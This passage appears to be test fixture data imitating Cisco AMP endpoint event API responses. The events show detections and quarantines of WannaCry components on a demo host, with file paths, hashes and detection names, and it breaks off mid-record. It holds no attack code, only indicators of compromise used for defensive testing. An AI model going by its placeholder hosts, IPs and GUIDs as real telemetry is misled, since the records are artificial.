Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy 